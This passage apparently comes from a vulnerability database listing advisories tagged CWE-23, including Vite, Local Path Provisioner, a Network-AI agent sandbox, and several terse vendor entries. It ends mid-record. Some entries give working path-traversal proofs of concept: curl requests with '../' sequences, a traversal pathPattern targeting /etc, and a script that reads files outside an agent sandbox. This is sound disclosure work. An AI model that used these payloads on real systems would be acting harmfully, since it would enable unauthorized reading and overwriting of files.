Common Weakness Enumeration

CWE-23

Allowed

Relative Path Traversal

Abstraction: Base · Status: Draft

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

778 vulnerabilities reference this CWE, most recent first.

GHSA-JQFW-VQ24-V9C3

Vulnerability from github – Published: 2025-09-09 20:54 – Updated: 2025-09-09 20:54
VLAI
Summary
Vite's `server.fs` settings were not applied to HTML files
Details

Summary

Any HTML files on the machine were served regardless of the server.fs settings.

Impact

Only apps that match the following conditions are affected:

  • explicitly exposes the Vite dev server to the network (using --host or server.host config option)
  • appType: 'spa' (default) or appType: 'mpa' is used

This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.

Details

The serveStaticMiddleware function is in charge of serving static files from the server. It returns the viteServeStaticMiddleware function which runs the needed tests and serves the page. The viteServeStaticMiddleware function checks if the extension of the requested file is ".html". If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case htmlFallbackMiddleware, and then to indexHtmlMiddleware. These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.

PoC

Execute the following shell commands:

npm  create  vite@latest
cd vite-project/
echo  "secret" > /tmp/secret.html
npm install
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'

The contents of /tmp/secret.html will be returned.

This will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:

echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})'  >  [vite.config.js](http://vite.config.js)
mkdir secret_files
echo "secret txt" > secret_files/secret.txt
echo "secret html" > secret_files/secret.html
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'

You will receive a 403 HTTP Response,  because everything in the secret_files directory is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'

You will receive the contents of secret_files/secret.html.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.1.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.1.0"
            },
            {
              "fixed": "7.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.0.6"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.3.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.4.19"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.4.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58752"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-23",
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-09T20:54:42Z",
    "nvd_published_at": "2025-09-08T23:15:36Z",
    "severity": "LOW"
  },
  "details": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: \u0027spa\u0027` (default) or `appType: \u0027mpa\u0027` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn\u0027t serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don\u0027t perform any test against allow or deny rules, and they don\u0027t make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm  create  vite@latest\ncd vite-project/\necho  \"secret\" \u003e /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl  -v  --path-as-is  \u0027http://localhost:5173/../../../../../../../../../../../tmp/secret.html\u0027`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server\u0027s shell:\n\n```\necho  \u0027import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})\u0027  \u003e  [vite.config.js](http://vite.config.js)\nmkdir secret_files\necho \"secret txt\" \u003e secret_files/secret.txt\necho \"secret html\" \u003e secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl  -v  --path-as-is  \u0027http://localhost:5173/secret_files/secret.txt\u0027`\n\nYou will receive a 403 HTTP Response,\u00a0 because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl  -v  --path-as-is  \u0027http://localhost:5173/secret_files/secret.html\u0027`\n\nYou will receive the contents of secret_files/secret.html.",
  "id": "GHSA-jqfw-vq24-v9c3",
  "modified": "2025-09-09T20:54:42Z",
  "published": "2025-09-09T20:54:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58752"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vitejs/vite"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Vite\u0027s `server.fs` settings were not applied to HTML files"
}

GHSA-JR3W-9VFR-C746

Vulnerability from github – Published: 2026-02-04 20:17 – Updated: 2026-02-27 20:41
VLAI
Summary
Local Path Provisioner vulnerable to Path Traversal via parameters.pathPattern
Details

Impact

A malicious user can manipulate the parameters.pathPattern to create PersistentVolumes in arbitrary locations on the host node, potentially overwriting sensitive files or gaining access to unintended directories.

Example:

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: >
      {"apiVersion":"storage.k8s.io/v1","kind":"StorageClass","metadata":{"annotations":{},"name":"local-path"},"provisioner":"rancher.io/local-path","reclaimPolicy":"Delete","volumeBindingMode":"WaitForFirstConsumer"}
    storageclass.kubernetes.io/is-default-class: 'true'
  name: local-path
provisioner: rancher.io/local-path
reclaimPolicy: Delete
parameters:
  pathPattern: "{{ .PVC.Namespace }}/{{ .PVC.Name }}/../../../../../etc/new-dir"
volumeBindingMode: WaitForFirstConsumer
Results in the PersistentVolume to target /etc/new-dir:

This produces a PersistentVolume that points to /etc/new-dir, instead of a path under the configured base directory.

Expected Behavior: - Paths generated from pathPattern should always resolve under the configured base path. - Relative path elements (e.g., ..) should be normalized or rejected.

Patches

This vulnerability is addressed by validating and normalizing the parameters.pathPattern to ensure that generated PersistentVolume paths always resolve under the configured base directory. Any path traversal attempts using relative path elements are rejected, preventing PersistentVolumes from being created in arbitrary locations on the host node.

Previously, a malicious user could manipulate pathPattern to escape the base path and create volumes pointing to sensitive or unintended directories (for example, /etc), potentially overwriting host files or gaining unauthorized access.

With this fix, path patterns that resolve outside of the base directory are denied, and only safe, normalized paths under the configured base path are allowed.

Patched versions of local-path-provisioner include releases v0.0.34 (and later).

No patches are provided for earlier releases, as they do not include the necessary path validation and normalization logic.

Workarounds

There are no workarounds for this issue. Users must upgrade to a patched version of local-path-provisioner to fully mitigate the vulnerability.

References

There are any questions or comments about this advisory:

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/rancher/local-path-provisioner"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62878"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-04T20:17:42Z",
    "nvd_published_at": "2026-02-25T11:16:01Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nA malicious user can manipulate the [parameters.pathPattern](https://github.com/rancher/local-path-provisioner/blob/d4f71b4b03a321e9f54be00808e9de42b8bfd35a/provisioner.go#L381) to create PersistentVolumes in arbitrary locations on the host node, potentially overwriting sensitive files or gaining access to unintended directories.\n\nExample:\n```\napiVersion: storage.k8s.io/v1\nkind: StorageClass\nmetadata:\n  annotations:\n    kubectl.kubernetes.io/last-applied-configuration: \u003e\n      {\"apiVersion\":\"storage.k8s.io/v1\",\"kind\":\"StorageClass\",\"metadata\":{\"annotations\":{},\"name\":\"local-path\"},\"provisioner\":\"rancher.io/local-path\",\"reclaimPolicy\":\"Delete\",\"volumeBindingMode\":\"WaitForFirstConsumer\"}\n    storageclass.kubernetes.io/is-default-class: \u0027true\u0027\n  name: local-path\nprovisioner: rancher.io/local-path\nreclaimPolicy: Delete\nparameters:\n  pathPattern: \"{{ .PVC.Namespace }}/{{ .PVC.Name }}/../../../../../etc/new-dir\"\nvolumeBindingMode: WaitForFirstConsumer\nResults in the PersistentVolume to target /etc/new-dir:\n```\nThis produces a PersistentVolume that points to `/etc/new-dir`, instead of a path under the configured base directory.\n\nExpected Behavior:\n- Paths generated from pathPattern should always resolve under the configured base path.\n- Relative path elements (e.g., ..) should be normalized or rejected.\n\n\n### Patches\n\nThis vulnerability is addressed by validating and normalizing the `parameters.pathPattern` to ensure that generated PersistentVolume paths always resolve under the configured base directory. Any path traversal attempts using relative path elements are rejected, preventing PersistentVolumes from being created in arbitrary locations on the host node.\n\nPreviously, a malicious user could manipulate `pathPattern` to escape the base path and create volumes pointing to sensitive or unintended directories (for example, `/etc`), potentially overwriting host files or gaining unauthorized access.\n\nWith this fix, path patterns that resolve outside of the base directory are denied, and only safe, normalized paths under the configured base path are allowed.\n\nPatched versions of local-path-provisioner include releases v0.0.34 (and later).\n\nNo patches are provided for earlier releases, as they do not include the necessary path validation and normalization logic.\n\n### Workarounds\n\nThere are no workarounds for this issue. Users must upgrade to a patched version of local-path-provisioner to fully mitigate the vulnerability.\n\n### References\n\nThere are any questions or comments about this advisory:\n\n- Contact the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.",
  "id": "GHSA-jr3w-9vfr-c746",
  "modified": "2026-02-27T20:41:26Z",
  "published": "2026-02-04T20:17:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rancher/local-path-provisioner/security/advisories/GHSA-jr3w-9vfr-c746"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62878"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-62878"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rancher/local-path-provisioner"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rancher/local-path-provisioner/blob/d4f71b4b03a321e9f54be00808e9de42b8bfd35a/provisioner.go#L381"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Local Path Provisioner vulnerable to Path Traversal via parameters.pathPattern"
}

GHSA-JVCM-F35G-W78P

Vulnerability from github – Published: 2026-06-19 21:42 – Updated: 2026-06-19 21:42
VLAI
Summary
Network-AI: AgentRuntime sandbox path-prefix checks allow file access outside the configured base directory
Details

Summary

AgentRuntime promises scoped file access under a configured sandbox basePath, but its path containment checks use raw string prefix tests. A sandbox base such as /tmp/network-ai-sandbox also matches a sibling path such as /tmp/network-ai-sandbox_evil/secret.txt.

An agent/user that can call AgentRuntime.readFile() or AgentRuntime.listDir() can read or list files outside the intended sandbox when the target path is in a sibling directory sharing the base path prefix. This breaks the documented sandbox boundary. Confirmed in Network-AI 5.12.1. Severity: Medium, CVSS 3.1 vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N.

Details

The vulnerable containment check is in lib/agent-runtime.ts:

resolvePath(filePath: string): string | null {
  const normalized = normalize(filePath);
  const absolute = isAbsolute(normalized)
    ? normalized
    : join(this.config.basePath, normalized);
  const resolved = resolve(absolute);

  // Traversal check
  if (!resolved.startsWith(this.config.basePath)) return null;
  return resolved;
}

startsWith() is not path-boundary-aware. If this.config.basePath is /tmp/network-ai-sandbox, then /tmp/network-ai-sandbox_evil/secret.txt also starts with /tmp/network-ai-sandbox despite being outside the sandbox.

The same pattern appears in SandboxPolicy.isPathAllowed() for allowed and blocked paths. FileAccessor.read(), FileAccessor.write(), and FileAccessor.list() rely on these checks before I/O, and AgentRuntime.readFile() exposes this behavior. Reads auto-approve by default when autoApproveReads is enabled.

Affected source evidence:

  • lib/agent-runtime.ts:393-423isPathAllowed() / resolvePath() use string startsWith() containment.
  • lib/agent-runtime.ts:669-691 — file read sink relies on those checks.
  • lib/agent-runtime.ts:933-958AgentRuntime.readFile() exposes file reads.

PoC

Run from the repository root after installing dependencies:

node -r ts-node/register/transpile-only - <<'TS'
const { mkdtempSync, mkdirSync, writeFileSync, rmSync } = require('fs');
const { tmpdir } = require('os');
const { join } = require('path');
const { AgentRuntime } = require('./lib/agent-runtime');

(async () => {
  const parent = mkdtempSync(join(tmpdir(), 'network-ai-poc-'));
  const base = join(parent, 'sandbox');
  const sibling = join(parent, 'sandbox_evil');
  mkdirSync(base);
  mkdirSync(sibling);
  writeFileSync(join(sibling, 'secret.txt'), 'SECRET_OUTSIDE_SANDBOX', 'utf8');

  const runtime = new AgentRuntime({
    policy: { basePath: base, allowedPaths: ['.'], allowedCommands: [] },
  });

  const absoluteRead = await runtime.readFile(join(sibling, 'secret.txt'), 'poc-agent');
  const relativeRead = await runtime.readFile('../sandbox_evil/secret.txt', 'poc-agent');
  console.log(JSON.stringify({
    base,
    outside: join(sibling, 'secret.txt'),
    absoluteRead: { success: absoluteRead.success, content: absoluteRead.content },
    relativeRead: { success: relativeRead.success, content: relativeRead.content },
  }, null, 2));
  rmSync(parent, { recursive: true, force: true });
})();
TS

Observed result: both reads succeed and return SECRET_OUTSIDE_SANDBOX, even though the file is outside basePath.

Impact

An agent/user with access to AgentRuntime file operations can bypass the intended sandbox root and read or list files outside the sandbox when those files are located in sibling paths sharing the sandbox base path prefix. This is a sandbox boundary bypass and path traversal vulnerability. Default confirmed impact is read/list disclosure. If an embedding application uses FileAccessor.write() directly or auto-approves runtime writes, the same root cause may allow writes outside the intended sandbox to prefix-collision sibling paths. No RCE chain was confirmed.


Resolution (maintainer)

Fixed in v5.12.2 (commit a59c13a). Install: npm install network-ai@5.12.2 — published to npm with provenance.

SandboxPolicy.resolvePath() and isPathAllowed() now use separator-anchored prefix checks (resolved === base || resolved.startsWith(base + path.sep)) for both the allow-list and block-list. A sibling directory that merely shares a name prefix (e.g. /srv/app-evil vs base /srv/app) is no longer treated as in-scope.

All 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.12.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "network-ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:42:29Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n`AgentRuntime` promises scoped file access under a configured sandbox `basePath`, but its path containment checks use raw string prefix tests. A sandbox base such as `/tmp/network-ai-sandbox` also matches a sibling path such as `/tmp/network-ai-sandbox_evil/secret.txt`.\n\nAn agent/user that can call `AgentRuntime.readFile()` or `AgentRuntime.listDir()` can read or list files outside the intended sandbox when the target path is in a sibling directory sharing the base path prefix. This breaks the documented sandbox boundary. Confirmed in Network-AI 5.12.1. Severity: Medium, CVSS 3.1 vector `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N`.\n\n### Details\nThe vulnerable containment check is in `lib/agent-runtime.ts`:\n\n```ts\nresolvePath(filePath: string): string | null {\n  const normalized = normalize(filePath);\n  const absolute = isAbsolute(normalized)\n    ? normalized\n    : join(this.config.basePath, normalized);\n  const resolved = resolve(absolute);\n\n  // Traversal check\n  if (!resolved.startsWith(this.config.basePath)) return null;\n  return resolved;\n}\n```\n\n`startsWith()` is not path-boundary-aware. If `this.config.basePath` is `/tmp/network-ai-sandbox`, then `/tmp/network-ai-sandbox_evil/secret.txt` also starts with `/tmp/network-ai-sandbox` despite being outside the sandbox.\n\nThe same pattern appears in `SandboxPolicy.isPathAllowed()` for allowed and blocked paths. `FileAccessor.read()`, `FileAccessor.write()`, and `FileAccessor.list()` rely on these checks before I/O, and `AgentRuntime.readFile()` exposes this behavior. Reads auto-approve by default when `autoApproveReads` is enabled.\n\nAffected source evidence:\n\n- `lib/agent-runtime.ts:393-423` \u2014 `isPathAllowed()` / `resolvePath()` use string `startsWith()` containment.\n- `lib/agent-runtime.ts:669-691` \u2014 file read sink relies on those checks.\n- `lib/agent-runtime.ts:933-958` \u2014 `AgentRuntime.readFile()` exposes file reads.\n\n### PoC\nRun from the repository root after installing dependencies:\n\n```bash\nnode -r ts-node/register/transpile-only - \u003c\u003c\u0027TS\u0027\nconst { mkdtempSync, mkdirSync, writeFileSync, rmSync } = require(\u0027fs\u0027);\nconst { tmpdir } = require(\u0027os\u0027);\nconst { join } = require(\u0027path\u0027);\nconst { AgentRuntime } = require(\u0027./lib/agent-runtime\u0027);\n\n(async () =\u003e {\n  const parent = mkdtempSync(join(tmpdir(), \u0027network-ai-poc-\u0027));\n  const base = join(parent, \u0027sandbox\u0027);\n  const sibling = join(parent, \u0027sandbox_evil\u0027);\n  mkdirSync(base);\n  mkdirSync(sibling);\n  writeFileSync(join(sibling, \u0027secret.txt\u0027), \u0027SECRET_OUTSIDE_SANDBOX\u0027, \u0027utf8\u0027);\n\n  const runtime = new AgentRuntime({\n    policy: { basePath: base, allowedPaths: [\u0027.\u0027], allowedCommands: [] },\n  });\n\n  const absoluteRead = await runtime.readFile(join(sibling, \u0027secret.txt\u0027), \u0027poc-agent\u0027);\n  const relativeRead = await runtime.readFile(\u0027../sandbox_evil/secret.txt\u0027, \u0027poc-agent\u0027);\n  console.log(JSON.stringify({\n    base,\n    outside: join(sibling, \u0027secret.txt\u0027),\n    absoluteRead: { success: absoluteRead.success, content: absoluteRead.content },\n    relativeRead: { success: relativeRead.success, content: relativeRead.content },\n  }, null, 2));\n  rmSync(parent, { recursive: true, force: true });\n})();\nTS\n```\n\nObserved result: both reads succeed and return `SECRET_OUTSIDE_SANDBOX`, even though the file is outside `basePath`.\n\n### Impact\nAn agent/user with access to `AgentRuntime` file operations can bypass the intended sandbox root and read or list files outside the sandbox when those files are located in sibling paths sharing the sandbox base path prefix. This is a sandbox boundary bypass and path traversal vulnerability. Default confirmed impact is read/list disclosure. If an embedding application uses `FileAccessor.write()` directly or auto-approves runtime writes, the same root cause may allow writes outside the intended sandbox to prefix-collision sibling paths. No RCE chain was confirmed.\n\n\n---\n\n### Resolution (maintainer)\n\n**Fixed in [v5.12.2](https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2) (commit `a59c13a`).** Install: `npm install network-ai@5.12.2` \u2014 published to npm with provenance.\n\n`SandboxPolicy.resolvePath()` and `isPathAllowed()` now use separator-anchored prefix checks (`resolved === base || resolved.startsWith(base + path.sep)`) for both the allow-list and block-list. A sibling directory that merely shares a name prefix (e.g. `/srv/app-evil` vs base `/srv/app`) is no longer treated as in-scope.\n\nAll 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.",
  "id": "GHSA-jvcm-f35g-w78p",
  "modified": "2026-06-19T21:42:29Z",
  "published": "2026-06-19T21:42:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-jvcm-f35g-w78p"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/commit/a59c13a1f0ce0e8a0779a90343eef92fac5ab4c3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Jovancoding/Network-AI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Network-AI: AgentRuntime sandbox path-prefix checks allow file access outside the configured base directory"
}

GHSA-JXF2-W3FH-QG4V

Vulnerability from github – Published: 2024-03-13 18:31 – Updated: 2024-03-13 18:31
VLAI
Details

The File Manager and File Manager Pro plugins for WordPress are vulnerable to Directory Traversal in versions up to, and including version 7.2.1 (free version) and 8.3.4 (Pro version) via the target parameter in the mk_file_folder_manager_action_callback_shortcode function. This makes it possible for attackers to read the contents of arbitrary files on the server, which can contain sensitive information and to upload files into directories other than the intended directory for file uploads. The free version requires Administrator access for this vulnerability to be exploitable. The Pro version allows a file manager to be embedded via a shortcode and also allows admins to grant file handling privileges to other user levels, which could lead to this vulnerability being exploited by lower-level users.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-6825"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-13T16:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "The File Manager and File Manager Pro plugins for WordPress are vulnerable to Directory Traversal in versions up to, and including version 7.2.1 (free version) and 8.3.4 (Pro version) via the target parameter in the  mk_file_folder_manager_action_callback_shortcode function. This makes it possible for attackers to read the contents of arbitrary files on the server, which can contain sensitive information and to upload files into directories other than the intended directory for file uploads. The free version requires Administrator access for this vulnerability to be exploitable. The Pro version allows a file manager to be embedded via a shortcode and also allows admins to grant file handling privileges to other user levels, which could lead to this vulnerability being exploited by lower-level users.",
  "id": "GHSA-jxf2-w3fh-qg4v",
  "modified": "2024-03-13T18:31:31Z",
  "published": "2024-03-13T18:31:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6825"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Studio-42/elFinder/blob/master/php/elFinderVolumeDriver.class.php#L6784"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3023403%40wp-file-manager%2Ftrunk\u0026old=2984933%40wp-file-manager%2Ftrunk\u0026sfp_email=\u0026sfph_mail="
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/93f377a1-2c33-4dd7-8fd6-190d9148e804?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M248-H4R7-GVCG

Vulnerability from github – Published: 2025-02-12 15:32 – Updated: 2025-02-12 15:32
VLAI
Details

A CWE-23 "Relative Path Traversal" in the file upload mechanism in Q-Free MaxTime less than or equal to version 2.11.0 allows an authenticated remote attacker to overwrite arbitrary files via crafted HTTP requests.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26349"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-12T14:15:34Z",
    "severity": "HIGH"
  },
  "details": "A CWE-23 \"Relative Path Traversal\" in the file upload mechanism in Q-Free MaxTime less than or equal to version 2.11.0 allows an authenticated remote attacker to overwrite arbitrary files via crafted HTTP requests.",
  "id": "GHSA-m248-h4r7-gvcg",
  "modified": "2025-02-12T15:32:00Z",
  "published": "2025-02-12T15:32:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26349"
    },
    {
      "type": "WEB",
      "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-26349"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M3M6-68FJ-X8XV

Vulnerability from github – Published: 2024-03-29 18:30 – Updated: 2024-03-29 18:30
VLAI
Details

Dell OpenManage Enterprise, v4.0 and prior, contain(s) a path traversal vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, to gain unauthorized access to the files stored on the server filesystem, with the privileges of the running web application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-25944"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-29T17:15:11Z",
    "severity": "MODERATE"
  },
  "details": "Dell OpenManage Enterprise, v4.0 and prior, contain(s) a path traversal vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, to gain unauthorized access to the files stored on the server filesystem, with the privileges of the running web application.",
  "id": "GHSA-m3m6-68fj-x8xv",
  "modified": "2024-03-29T18:30:42Z",
  "published": "2024-03-29T18:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25944"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000223623/dsa-2024-100-security-update-for-dell-openmanage-enterprise-path-traversal-sensitive-data-disclosure-vulnerability"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M47G-GHR5-3734

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32
VLAI
Details

An unauthorized file deletion vulnerability exists in the latest version of the Polyaxon platform, which can lead to denial of service by terminating critical containers. An attacker can delete important files within the containers, such as polyaxon.sock, causing the API container to exit unexpectedly. This disrupts related services and prevents the system from functioning normally, without requiring authentication or UUID parameters.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9363"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-20T10:15:48Z",
    "severity": "HIGH"
  },
  "details": "An unauthorized file deletion vulnerability exists in the latest version of the Polyaxon platform, which can lead to denial of service by terminating critical containers. An attacker can delete important files within the containers, such as `polyaxon.sock`, causing the API container to exit unexpectedly. This disrupts related services and prevents the system from functioning normally, without requiring authentication or UUID parameters.",
  "id": "GHSA-m47g-ghr5-3734",
  "modified": "2025-03-20T12:32:51Z",
  "published": "2025-03-20T12:32:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9363"
